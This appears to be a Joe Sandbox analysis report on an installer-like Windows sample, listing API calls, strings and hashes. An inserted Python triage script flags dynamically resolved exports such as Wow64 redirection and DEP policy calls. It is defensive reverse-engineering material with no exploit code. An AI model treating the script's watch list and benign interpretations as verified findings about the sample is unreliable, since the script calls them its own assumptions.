                                                                                            • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                            • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(739B0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-256906917
                                                                                            • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                            • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                            • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID: 3A$yA
                                                                                            • API String ID: 3887896539-3278460822
                                                                                            • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                            • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                            APIs
                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                            • API String ID: 3376378930-166502273
                                                                                            • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                            • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F58F
                                                                                            • GetFocus.USER32 ref: 0042F597
                                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                            • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                            • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                            • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
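Added triage example (not part of the Joe Sandbox report and not code from the analysed sample): the three entries above that resolve exports by name, SHGetFolderPathA at 0047CF7A, SetDllDirectoryW / SetSearchPathMode / SetProcessDEPPolicy at 0040632F-0040635B, and the Wow64 FS-redirection pair at 00453216 / 00453230, share one pattern, a GetModuleHandleA or LoadLibrary call followed by GetProcAddress. The sandbox prints raw stack slots as arguments, so the export name is not always inside the GetProcAddress line: at 00453216 and 00453230 the arguments read `(00000000,kernel32.dll)` while the name appears in the preceding GetModuleHandleA line, one slot after the module name. The script parses these `• Api.MODULE(args), ref: ADDR` lines (the sample input is copied from the entries above), recovers the resolved export with that fallback, and reports the ones on a small watch list. The watch list, its reason strings and the stack-residue heuristic are assumptions of this example, not findings of the report.

```python
"""Triage helper for Joe Sandbox "APIs" listings.

Added example for this report page, not part of Joe Sandbox or of the
analysed sample. Parses "• Api.MODULE(args), ref: ADDR" lines, recovers the
export each GetProcAddress resolves, and flags a small watch list. The watch
list, its wording and the stack-residue heuristic are this example's
assumptions, not statements made by the report.
"""
import re

# Constructed input: the API lines of three entries in the report
# (SHGetFolderPathA, SetProcessDEPPolicy, Wow64 FS redirection), copied
# verbatim and concatenated.
SAMPLE_API_LINES = """\
• GetProcAddress.KERNEL32(739B0000,SHGetFolderPathA), ref: 0047CF7A
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
IDENT_RE = re.compile(r"[A-Za-z_]\w*")   # looks like an export name
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")   # looks like a pointer or handle

MODULE_LOOKUPS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}

# Exports worth a second look when resolved at run time (our interpretation).
WATCHLIST = {
    "Wow64DisableWow64FsRedirection": "32-bit code reaching the native System32 (SysWOW64 redirection off)",
    "Wow64RevertWow64FsRedirection": "redirection restored after native-System32 access",
    "SetProcessDEPPolicy": "process DEP policy changed (arg 1 == PROCESS_DEP_ENABLE)",
    "SetDllDirectoryW": "DLL search order changed (hardening when called with an empty string)",
    "SetSearchPathMode": "SearchPath behaviour changed (safe search mode when enabled)",
    "SHGetFolderPathA": "known-folder lookup resolved by name rather than imported",
}


def parse_api_lines(text):
    """One dict per API line; lines that do not fit the report format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m["args"] or ""          # calls without an argument list (e.g. GetFocus) have none
        args = [a.strip() for a in raw.split(",")] if raw else []
        records.append({"api": m["api"], "module": m["module"], "args": args, "ref": m["ref"]})
    return records


def _identifiers(args):
    """Arguments that look like export names, not pointers, '?' or module names."""
    return [a for a in args if IDENT_RE.fullmatch(a) and not HEX_RE.fullmatch(a)]


def find_dynamic_resolutions(records):
    """Pair each GetProcAddress with the export it most likely resolves.

    The sandbox prints raw stack slots as arguments, so the name is not always
    in the GetProcAddress line: at 00453216 the arguments are
    (00000000,kernel32.dll) while the name sits in the preceding
    GetModuleHandleA line, one slot after the module name, which is what
    'push name; push module; call GetModuleHandleA; push eax; call
    GetProcAddress' leaves on the stack. Fall back to that slot (assumption).
    """
    findings = []
    pending = None
    for rec in records:
        if rec["api"] in MODULE_LOOKUPS:
            residue = _identifiers(rec["args"][1:])
            pending = residue[0] if residue else None
            continue
        if rec["api"] != "GetProcAddress":
            continue
        own = _identifiers(rec["args"][1:])
        export = own[0] if own else pending
        pending = None
        if export is not None:
            findings.append({"ref": rec["ref"], "export": export,
                             "reason": WATCHLIST.get(export, "not on watch list")})
    return findings


def dep_policy_changes(records):
    """(ref, flags) for every SetProcessDEPPolicy call; flags 1 == PROCESS_DEP_ENABLE."""
    return [(r["ref"], int(r["args"][0], 16))
            for r in records if r["api"] == "SetProcessDEPPolicy" and r["args"]]


def triage(text):
    """Human-readable summary of the watch-list hits in an APIs listing."""
    records = parse_api_lines(text)
    lines = [f"{f['ref']}  GetProcAddress -> {f['export']}: {f['reason']}"
             for f in find_dynamic_resolutions(records) if f["export"] in WATCHLIST]
    lines += [f"{ref}  SetProcessDEPPolicy(flags=0x{flags:x})"
              for ref, flags in dep_policy_changes(records)]
    return "\n".join(lines)


if __name__ == "__main__":
    print(triage(SAMPLE_API_LINES))
```

Run it as is to print the six watch-list hits plus the DEP call; feed the API lines of any other entry to `parse_api_lines` to triage a whole report. Two reading notes for the hits it produces here: the `SetProcessDEPPolicy(00000001, ...)` call at 00406366 enables DEP (PROCESS_DEP_ENABLE is 1), and SetDllDirectoryW / SetSearchPathMode are the usual DLL search-order hardening calls of an installer runtime, so that trio is not a malware indicator on its own; the `_isetup\_shfoldr.dll` path and the `Failed to get address of SHGetFolderPath function` string next to the SHGetFolderPathA lookup are the ones Inno Setup's installer runtime uses for its bundled SHFolder shim. The Wow64 redirection toggle is the hit worth following up, since it tells you the 32-bit process deliberately reaches the native System32 directory.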
                                                                                            APIs
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                            • API String ID: 4130936913-2943970505
                                                                                            • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                            • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                              • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                              • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                              • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                              • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                            • API String ID: 854858120-615399546
                                                                                            • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                            • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                            APIs
                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                            • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                            • String ID: 2$MAINICON
                                                                                            • API String ID: 3935243913-3181700818
                                                                                            • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                            • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                            • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                            • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            Strings
                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 2948443157-222967699
                                                                                            • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                            • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
